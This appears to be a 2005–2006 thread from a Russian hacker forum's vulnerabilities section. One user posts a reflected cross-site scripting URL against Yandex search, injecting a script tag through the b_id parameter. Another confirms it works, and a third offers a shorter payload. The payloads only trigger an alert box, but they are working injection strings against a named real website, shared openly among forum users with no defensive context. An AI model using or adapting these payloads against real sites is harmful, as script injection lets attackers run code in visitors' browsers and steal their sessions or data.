yandex.ru xss

Discussion in 'Уязвимости' started by ZaCo, 31 Dec 2005.

  1. ZaCo

    ZaCo Banned

    Joined:
    20 Jun 2005
    Messages:
    737
    Likes Received:
    336
    Reputations:
    215
    мдамс... новый год:
    Code:
    http://www.yandex.ru/yandsearch?b_id=xaxa"><script>alert('XAXA')</script><a%20s="
     
    #1 ZaCo, 31 Dec 2005
  2. D1mOn

    D1mOn Elder - Старейшина

    Joined:
    2 Oct 2005
    Messages:
    380
    Likes Received:
    144
    Reputations:
    29
    есть такое дело)))
     
    #2 D1mOn, 31 Dec 2005
  3. Dronga

    Dronga ВАША реклама ТУТ!!

    Joined:
    1 Jul 2005
    Messages:
    575
    Likes Received:
    239
    Reputations:
    249
    Красиво конечно, но слишком много лишнего. Работает и вот так:
    Code:
    "><script>alert('XAXA')</script>
    И по-моему эта xss уже давно на паблике, но не уверен. ZaCo молодец как всегда)
     
    #3 Dronga, 1 Jan 2006
(You must log in or sign up to post here.)